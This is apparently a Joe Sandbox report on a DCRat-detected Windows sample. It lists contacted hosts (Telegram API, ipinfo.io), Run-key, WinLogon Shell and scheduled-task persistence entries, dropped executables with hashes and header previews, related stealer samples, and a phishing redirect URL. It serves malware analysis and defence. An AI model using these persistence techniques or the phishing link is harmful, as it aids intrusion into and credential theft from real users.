https://api.telegram.org/bot | SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003397000.00000004.00000800.00020000.00000000.sdmp, SurrogatewebSession.exe, 00000008.00000002.1734323133.0000000002E02000.00000002.00000001.01000000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002729000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002613000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002740000.00000004.00000800.00020000.00000000.sdmp, rGzNBWQu.log.43.dr, lKwWBiIK.log.8.dr | false | | high
http://api.telegram.org | SurrogatewebSession.exe, 00000008.00000002.1734602264.00000000033D1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003051000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.00000000029C8000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ipinfo.io | SurrogatewebSession.exe, 00000008.00000002.1734602264.000000000379A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ipinfo.io | SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003349000.00000004.00000800.00020000.00000000.sdmp, SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003051000.00000004.00000800.00020000.00000000.sdmp, SurrogatewebSession.exe, 00000008.00000002.1734602264.000000000377C000.00000004.00000800.00020000.00000000.sdmp | false | | high

Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious
34.117.186.192 | ipinfo.io | United States | 139070 | GOOGLE-AS-APGoogleAsiaPacificPteLtdSG | false
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                    Analysis ID:1417539
                                                    Start date and time:2024-03-29 15:26:04 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 9m 14s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:49
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:1
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:H9gMIu2HXi.exe
                                                    renamed because original name is a hash value
                                                    Original Sample Name:4fb1d8f8dff638f2c9b382f9552b18e2.bin.exe
                                                    Detection:MAL
                                                    Classification:mal100.spre.troj.expl.evad.winEXE@60/41@2/2
                                                    EGA Information:
                                                    • Successful, ratio: 38.5%
                                                    HCA Information:
                                                    • Successful, ratio: 90%
                                                    • Number of executed functions: 365
                                                    • Number of non-executed functions: 185
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, consent.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, 131217cm.n9shteam3.top, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                    • Execution Graph export aborted for target SurrogatewebSession.exe, PID 7552 because it is empty
                                                    • Execution Graph export aborted for target SurrogatewebSession.exe, PID 7556 because it is empty
                                                    • Execution Graph export aborted for target SurrogatewebSession.exe, PID 7916 because it is empty
                                                    • Execution Graph export aborted for target vXKtedDiKZHKptbUFqIBdHmZ.exe, PID 7264 because it is empty
                                                    • Execution Graph export aborted for target vXKtedDiKZHKptbUFqIBdHmZ.exe, PID 7948 because it is empty
                                                    • Execution Graph export aborted for target vXKtedDiKZHKptbUFqIBdHmZ.exe, PID 7964 because it is empty
                                                    • Execution Graph export aborted for target winlogon.exe, PID 7532 because it is empty
                                                    • Execution Graph export aborted for target winlogon.exe, PID 7568 because it is empty
                                                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
14:26:55 | Task Scheduler | Run new task: vXKtedDiKZHKptbUFqIBdHmZ path: "C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe"
14:26:55 | Task Scheduler | Run new task: vXKtedDiKZHKptbUFqIBdHmZv path: "C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe"
14:26:57 | Task Scheduler | Run new task: SurrogatewebSession path: "C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe"
14:26:57 | Task Scheduler | Run new task: SurrogatewebSessionS path: "C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe"
14:26:57 | Task Scheduler | Run new task: winlogon path: "C:\Recovery\winlogon.exe"
14:26:57 | Task Scheduler | Run new task: winlogonw path: "C:\Recovery\winlogon.exe"
14:27:00 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZ "C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe"
14:27:09 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run winlogon "C:\Recovery\winlogon.exe"
14:27:17 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SurrogatewebSession "C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe"
14:27:26 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZ "C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe"
14:27:35 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run winlogon "C:\Recovery\winlogon.exe"
14:27:44 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SurrogatewebSession "C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe"
14:27:52 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZ "C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe"
14:28:02 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run winlogon "C:\Recovery\winlogon.exe"
14:28:10 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run SurrogatewebSession "C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe"
14:28:28 | Autostart | Run: WinLogon Shell "C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe"
14:28:37 | Autostart | Run: WinLogon Shell "C:\Program Files (x86)\java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe"
14:28:46 | Autostart | Run: WinLogon Shell "C:\Recovery\winlogon.exe"
14:28:55 | Autostart | Run: WinLogon Shell "C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe"
15:26:49 | API Interceptor | 1x Sleep call for process: H9gMIu2HXi.exe modified
15:26:57 | API Interceptor | 28x Sleep call for process: SurrogatewebSession.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
34.117.186.192 | SecuriteInfo.com.Win32.Evo-gen.24318.16217.exe | malicious | Unknown | ipinfo.io/json
 | SecuriteInfo.com.Win32.Evo-gen.28489.31883.exe | malicious | Unknown | ipinfo.io/json
 | Raptor.HardwareService.Setup 1.msi | malicious | Unknown | ipinfo.io/ip
 | Conferma_Pdf_Editor.exe | malicious | Planet Stealer | ipinfo.io/
 | Conferma_Pdf_Editor.exe | malicious | Planet Stealer | ipinfo.io/
 | w.sh | malicious | Xmrig | /ip
 | Raptor.HardwareService.Setup_2.3.6.0.msi | malicious | Unknown | ipinfo.io/ip
 | Raptor.HardwareService.Setup_2.3.6.0.msi | malicious | Unknown | ipinfo.io/ip
 | uUsgzQ3DoW.exe | malicious | RedLine | ipinfo.io/ip
 | 8BZBgbeCcz.exe | malicious | RedLine | ipinfo.io/ip
149.154.167.220 | SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe | malicious | Clipboard Hijacker, XWorm, Xmrig |
 | SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe | malicious | Discord Token Stealer, XenoRAT, Xmrig |
 | SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe | malicious | Unknown |
 | x.exe | malicious | AgentTesla, PureLog Stealer, RedLine |
 | aMObJ2eTUf.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine, zgRAT |
 | iY40ylvr5y.exe | malicious | DCRat, PureLog Stealer, zgRAT |
 | DHL9407155789...exe | malicious | DarkCloud |
 | https://moodle-projects.wolfware.ncsu.edu/Shibboleth.sso/Logout?return=https://owa-storage-limitt.s3.us-east-2.amazonaws.com/owa-2024.html?uid=dGVzdEB0ZXN0LmNvbQo | malicious | HTMLPhisher |
 | lnvoice-1445766252.pdf.js | malicious | AgentTesla, PureLog Stealer, zgRAT |
 | JUSTIF.TRANSF..exe | malicious | AgentTesla |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ipinfo.io | InjectToolInstaller.exe | malicious | PureLog Stealer | 34.117.186.192
 | MXpl6HFisn.exe | malicious | RisePro Stealer | 34.117.186.192
 | XqC4Zcp8qg.exe | malicious | RisePro Stealer | 34.117.186.192
 | 3MdZ1WiAYP.exe | malicious | RisePro Stealer | 34.117.186.192
 | 7GofFHQDvk.exe | malicious | RisePro Stealer | 34.117.186.192
 | 88Oj06xDol.exe | malicious | RisePro Stealer | 34.117.186.192
 | uQeIMs91Vh.exe | malicious | Amadey, PureLog Stealer, RedLine, RisePro Stealer, zgRAT | 34.117.186.192
 | jUlAlD6KHz.exe | malicious | RisePro Stealer | 34.117.186.192
 | Iv88OQbqpE.exe | malicious | RisePro Stealer | 34.117.186.192
 | file.exe | malicious | RisePro Stealer | 34.117.186.192
api.telegram.org | SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe | malicious | Clipboard Hijacker, XWorm, Xmrig | 149.154.167.220
 | SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe | malicious | Discord Token Stealer, XenoRAT, Xmrig | 149.154.167.220
 | SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe | malicious | Unknown | 149.154.167.220
 | x.exe | malicious | AgentTesla, PureLog Stealer, RedLine | 149.154.167.220
 | aMObJ2eTUf.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine, zgRAT | 149.154.167.220
 | iY40ylvr5y.exe | malicious | DCRat, PureLog Stealer, zgRAT | 149.154.167.220
 | DHL9407155789...exe | malicious | DarkCloud | 149.154.167.220
 | https://moodle-projects.wolfware.ncsu.edu/Shibboleth.sso/Logout?return=https://owa-storage-limitt.s3.us-east-2.amazonaws.com/owa-2024.html?uid=dGVzdEB0ZXN0LmNvbQo | malicious | HTMLPhisher | 149.154.167.220
 | lnvoice-1445766252.pdf.js | malicious | AgentTesla, PureLog Stealer, zgRAT | 149.154.167.220
 | JUSTIF.TRANSF..exe | malicious | AgentTesla | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | Stealer.exe | malicious | Eternity Stealer | 149.154.167.99
 | SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe | malicious | Clipboard Hijacker, XWorm, Xmrig | 149.154.167.220
 | SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe | malicious | Discord Token Stealer, XenoRAT, Xmrig | 149.154.167.220
 | SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe | malicious | Unknown | 149.154.167.220
 | x.exe | malicious | AgentTesla, PureLog Stealer, RedLine | 149.154.167.220
 | aMObJ2eTUf.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine, zgRAT | 149.154.167.220
 | iY40ylvr5y.exe | malicious | DCRat, PureLog Stealer, zgRAT | 149.154.167.220
 | DHL9407155789...exe | malicious | DarkCloud | 149.154.167.220
 | https://moodle-projects.wolfware.ncsu.edu/Shibboleth.sso/Logout?return=https://owa-storage-limitt.s3.us-east-2.amazonaws.com/owa-2024.html?uid=dGVzdEB0ZXN0LmNvbQo | malicious | HTMLPhisher | 149.154.167.220
 | lnvoice-1445766252.pdf.js | malicious | AgentTesla, PureLog Stealer, zgRAT | 149.154.167.220
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG | https://peleki5574.wixsite.com/service-authentifica | malicious | Unknown | 34.117.60.144
 | InjectToolInstaller.exe | malicious | PureLog Stealer | 34.117.186.192
 | MXpl6HFisn.exe | malicious | RisePro Stealer | 34.117.186.192
 | l2ZKczbGRq.exe | malicious | Amadey, PureLog Stealer, RedLine, RisePro Stealer, zgRAT | 34.117.186.192
 | XqC4Zcp8qg.exe | malicious | RisePro Stealer | 34.117.186.192
 | 3MdZ1WiAYP.exe | malicious | RisePro Stealer | 34.117.186.192
 | 7GofFHQDvk.exe | malicious | RisePro Stealer | 34.117.186.192
 | 88Oj06xDol.exe | malicious | RisePro Stealer | 34.117.186.192
 | https://attwebupdate.w3spaces.com/ | malicious | Unknown | 34.117.239.71
 | uQeIMs91Vh.exe | malicious | Amadey, PureLog Stealer, RedLine, RisePro Stealer, zgRAT | 34.117.186.192
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | oBMlky3Rkm7h5QK.exe | malicious | AgentTesla | 34.117.186.192, 149.154.167.220
 | BL-INVOICE SHIPPING DOCUMENTS.exe | malicious | AgentTesla, PureLog Stealer | 34.117.186.192, 149.154.167.220
 | CamScanner.exe | malicious | AgentTesla, PureLog Stealer | 34.117.186.192, 149.154.167.220
 | bhevLCQYD6.exe | malicious | AgentTesla | 34.117.186.192, 149.154.167.220
 | TBC#01 Rev.A3 - lnexa.xls.exe | malicious | AgentTesla, PureLog Stealer | 34.117.186.192, 149.154.167.220
 | package80171530600.jpg.lnk | malicious | XWorm | 34.117.186.192, 149.154.167.220
 | DHL_LHER000678175.exe | malicious | AgentTesla, PureLog Stealer | 34.117.186.192, 149.154.167.220
 | inpau292101.js | malicious | FormBook | 34.117.186.192, 149.154.167.220
 | SecuriteInfo.com.Win32.PWSX-gen.9732.1319.exe | malicious | AgentTesla, PureLog Stealer | 34.117.186.192, 149.154.167.220
 | ocrev ns.ordine 290520280324.vbs | malicious | AgentTesla, GuLoader | 34.117.186.192, 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\Desktop\BudDliLc.log | ZT3pxe2Tb4.exe | malicious | DCRat, PureLog Stealer, zgRAT |
 | O5OjRoFGIW.exe | malicious | DCRat, PureLog Stealer, zgRAT |
 | iY40ylvr5y.exe | malicious | DCRat, PureLog Stealer, zgRAT |
 | 7GTGpZi6oi.exe | malicious | DCRat, PureLog Stealer, zgRAT |
 | GWCscceJsW.exe | malicious | DCRat, PureLog Stealer, zgRAT |
 | QHZoYVBjSD.exe | malicious | DCRat, PureLog Stealer, zgRAT |
 | qObijSd3Uj.exe | malicious | DCRat, PureLog Stealer, zgRAT |
 | 2EHDj2G1ow.exe | malicious | DCRat, PureLog Stealer, zgRAT |
 | UU5WXfH85a.exe | malicious | DCRat, PureLog Stealer, zgRAT |
 | k6AIKkidxG.exe | malicious | DCRat |
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:ASCII text, with very long lines (928), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):928
                                                                                            Entropy (8bit):5.900812002528903
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:bkTkTW8E3WkCDyMlo9LqlkWekd1kp04g/6QjL0rAy:I4yRGkfcoIAkd1ktPrL
                                                                                            MD5:AA0C8943E0B56773A703A4F11FA3F426
                                                                                            SHA1:E455A72445E6EA44F6F7D64C5B67BFBB4CFBE531
                                                                                            SHA-256:E9C7BD39DA80B540175D4D6777FC004DA68BAE5755DCB0F016E82CADDB89583D
                                                                                            SHA-512:B8E93F9346D18459327D2A62A9704BDFDF1EFC1C5D50B2083CD8F312853C52F5C1E43F5A69C0B304ADDB6692BBA051A559174FB48407F069B6CE97190B1CE66C
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):832512
                                                                                            Entropy (8bit):5.473650729139317
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:v5Tnns8tsXmTP/4u46B2emHJJMA+ppW3Ari4VVyZC0+1cp9LhCgEwBvbvHlJNZ6:v5Tn3PB2empJMA+p3iE0nTLhLDN6
                                                                                            MD5:1F994BA149832A45EBEDCE2D36A2CA21
                                                                                            SHA1:AB913617DE27A1079E7E0B6F871C78801C4CAFF9
                                                                                            SHA-256:C0664856C2E59F8CC9E0FF378FED29E6592F429819999E1A44EADE9DBC62187E
                                                                                            SHA-512:683CEF1209118F7AD304B5118DCA5F123F1EA5BB1EE3923C9EF42DECAC8E9ACF9536E6E9B583A04EBCB9E9AD304A948612E0E64CE533F006E0CE61F40F1E7DA3
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 70%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C.f................................. ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H.......X...X.......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:Arhangel archive data
                                                                                            Category:dropped
                                                                                            Size (bytes):173
                                                                                            Entropy (8bit):5.6426082173396805
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:E/ynJdqRFvqPyTsLLBzlxW2PzBWKTHrXJ+FvmM7yITUynd:iyJdq/vqPyABzF1W0X477ygUynd
                                                                                            MD5:6ABFFF567DD16F663EE65BD823A2BAF4
                                                                                            SHA1:7848788F54016FE63C9186E4F291C6AB3E0B1A0F
                                                                                            SHA-256:1C07F6BFFDD7424EB54C60A0FAF296446A58F2228F99EF83EF9B68903CD8B9EC
                                                                                            SHA-512:E36FB0CCD0F2FDE4DA177B1C382254FED315C029B022A565D8268C87B626F5A6BCDAA6F6C5147975DA1CCABA0043DBEFD7D8054454D66B1A47E05FCC53FCC006
                                                                                            Malicious:false
                                                                                            Preview:LGis95LbwXbOuTDDPjQovsGNOrRiVL8O49P4u6ht2ZOjW6kfIOBsMvZd9VdRomFlZMTuDJSSBhwVdg0SHvaHKPCIkv4ZdPFPTmKKm0b95srp9D9deLK2M8bJKLJSO3zvcgB1VqpRUbLbiWJgvb5SEMCVLAAbqIuC35McCIHyf3ivx
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):832512
                                                                                            Entropy (8bit):5.473650729139317
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:v5Tnns8tsXmTP/4u46B2emHJJMA+ppW3Ari4VVyZC0+1cp9LhCgEwBvbvHlJNZ6:v5Tn3PB2empJMA+p3iE0nTLhLDN6
                                                                                            MD5:1F994BA149832A45EBEDCE2D36A2CA21
                                                                                            SHA1:AB913617DE27A1079E7E0B6F871C78801C4CAFF9
                                                                                            SHA-256:C0664856C2E59F8CC9E0FF378FED29E6592F429819999E1A44EADE9DBC62187E
                                                                                            SHA-512:683CEF1209118F7AD304B5118DCA5F123F1EA5BB1EE3923C9EF42DECAC8E9ACF9536E6E9B583A04EBCB9E9AD304A948612E0E64CE533F006E0CE61F40F1E7DA3
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 70%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C.f................................. ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H.......X...X.......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):273
                                                                                            Entropy (8bit):5.744573863238078
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:OyWtaS7I/hxfdPCh9nrYB43vc2Qy99gWwQh7/C:DBwI/XfdA9nTvwU9dXh7/C
                                                                                            MD5:8076A5F3A6451BB9799AE924CCB4BDA2
                                                                                            SHA1:A5E23B61D3B6BA053AA73A59C38341C1B73AC2B0
                                                                                            SHA-256:D875F78CB7C05566D5E2FF7DA4A9BAEAACC3E82F8D499CED99339A10D1FAE32F
                                                                                            SHA-512:DC0FAD5AE37DB613885C47848F8D43F75CF3BD6B59E0DF9F56637F3F8014583768D014FC8AAF71DFE7A50BDB9385F3BA75950D806323859BFDCFEB12127240A4
                                                                                            Malicious:false
                                                                                            Preview:wZLv4eve8BANULTeSqJd0iTaFzSCybiUTKJvuc6o4WqdTbl9L7MZ7yaOFvpELtqgdq4KBhuzufjd1zGoOS10OJWet5p8w1cLpJAnga7nNXpcP6XQpB0220SUTZaG2vC2CYyrycHxUNm1e3OxhZTvBjSz1qTHA1vbUwa1IpbM4ChoNazZLniccR0cF90IIAxdbKhrdXp28H19Bola045WSS9D57wIySD4OEND3I5y7qeVa1abXZROEaLIKevgkgDpD7v7ahhs8HZlyomEg
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):832512
                                                                                            Entropy (8bit):5.473650729139317
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:v5Tnns8tsXmTP/4u46B2emHJJMA+ppW3Ari4VVyZC0+1cp9LhCgEwBvbvHlJNZ6:v5Tn3PB2empJMA+p3iE0nTLhLDN6
                                                                                            MD5:1F994BA149832A45EBEDCE2D36A2CA21
                                                                                            SHA1:AB913617DE27A1079E7E0B6F871C78801C4CAFF9
                                                                                            SHA-256:C0664856C2E59F8CC9E0FF378FED29E6592F429819999E1A44EADE9DBC62187E
                                                                                            SHA-512:683CEF1209118F7AD304B5118DCA5F123F1EA5BB1EE3923C9EF42DECAC8E9ACF9536E6E9B583A04EBCB9E9AD304A948612E0E64CE533F006E0CE61F40F1E7DA3
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 70%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C.f................................. ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H.......X...X.......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):181
                                                                                            Entropy (8bit):5.658566055953225
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:ZeR0/nbyNo11qxDVCfP0dqLO0tsmJzAXcK/SOTgAEP5BbIafVpwVZ:ZeGXPqxOkqLuxMkS+FY5uEpgZ
                                                                                            MD5:C123A201277EEE1D41A827BB7A9AF2CC
                                                                                            SHA1:AC7EA93BCAEBAC8F8D0D466DD12425C2682D0020
                                                                                            SHA-256:8CF03A55429BDA45BECE6D836975E6271FC3E612D8A4BF0F6EF094E5EB0568CA
                                                                                            SHA-512:E555D7AD3F9F8AD38BE1323F583A33395E6AE32EA7F099A00B2C4861D5549D547E68E9298F63338F3F0CA70651B94DECEBB2F4B5FB01EDDD32A59B564931C2C8
                                                                                            Malicious:false
                                                                                            Preview:vyIU3NyFvnT7zpOYzElCiGEdAXe7PPJG4dyzgnwzP8zROilUMYVQFnmouoUfs10gdNCW1Y1MRvxjQxPbvKv043AR1JF2TQHYITxBfPdxgJ8T0CY6Y2uiG9lkMverT92BoZb79O6gq7Tv5qbzvIeagiRJrNyuuwdhQ6obla6K6N1Ip0pfUp6Lf
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):832512
                                                                                            Entropy (8bit):5.473650729139317
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:v5Tnns8tsXmTP/4u46B2emHJJMA+ppW3Ari4VVyZC0+1cp9LhCgEwBvbvHlJNZ6:v5Tn3PB2empJMA+p3iE0nTLhLDN6
                                                                                            MD5:1F994BA149832A45EBEDCE2D36A2CA21
                                                                                            SHA1:AB913617DE27A1079E7E0B6F871C78801C4CAFF9
                                                                                            SHA-256:C0664856C2E59F8CC9E0FF378FED29E6592F429819999E1A44EADE9DBC62187E
                                                                                            SHA-512:683CEF1209118F7AD304B5118DCA5F123F1EA5BB1EE3923C9EF42DECAC8E9ACF9536E6E9B583A04EBCB9E9AD304A948612E0E64CE533F006E0CE61F40F1E7DA3
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 70%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C.f................................. ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H.......X...X.......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:ASCII text, with very long lines (836), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):836
                                                                                            Entropy (8bit):5.901204239279335
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:0scBBSzCh8ddhB9xXaMh3w5eLSh3f8h9Rv:aBYCydzNh3w5ek3kJ
                                                                                            MD5:E1188D4A27CB40AF562FC92D00787EAE
                                                                                            SHA1:B8CA0C38CDEA476CC12B1F8179810388DC39D932
                                                                                            SHA-256:8FB8A5EFEEC36277D9DBFE6AFD02932B51846D60F3D4A4C3610291C0ECFB058D
                                                                                            SHA-512:7CC6F77F049F59E47653E1E985641FACBE2A0E6EF45AE8BF35250238C20BF22EBD827B31CBEBB470E8BAF4DEBD9D8A4D019543BDA16697AD8D98D537CD7018D7
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):832512
                                                                                            Entropy (8bit):5.473650729139317
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:v5Tnns8tsXmTP/4u46B2emHJJMA+ppW3Ari4VVyZC0+1cp9LhCgEwBvbvHlJNZ6:v5Tn3PB2empJMA+p3iE0nTLhLDN6
                                                                                            MD5:1F994BA149832A45EBEDCE2D36A2CA21
                                                                                            SHA1:AB913617DE27A1079E7E0B6F871C78801C4CAFF9
                                                                                            SHA-256:C0664856C2E59F8CC9E0FF378FED29E6592F429819999E1A44EADE9DBC62187E
                                                                                            SHA-512:683CEF1209118F7AD304B5118DCA5F123F1EA5BB1EE3923C9EF42DECAC8E9ACF9536E6E9B583A04EBCB9E9AD304A948612E0E64CE533F006E0CE61F40F1E7DA3
                                                                                            Malicious:true
                                                                                            Yara Hits:
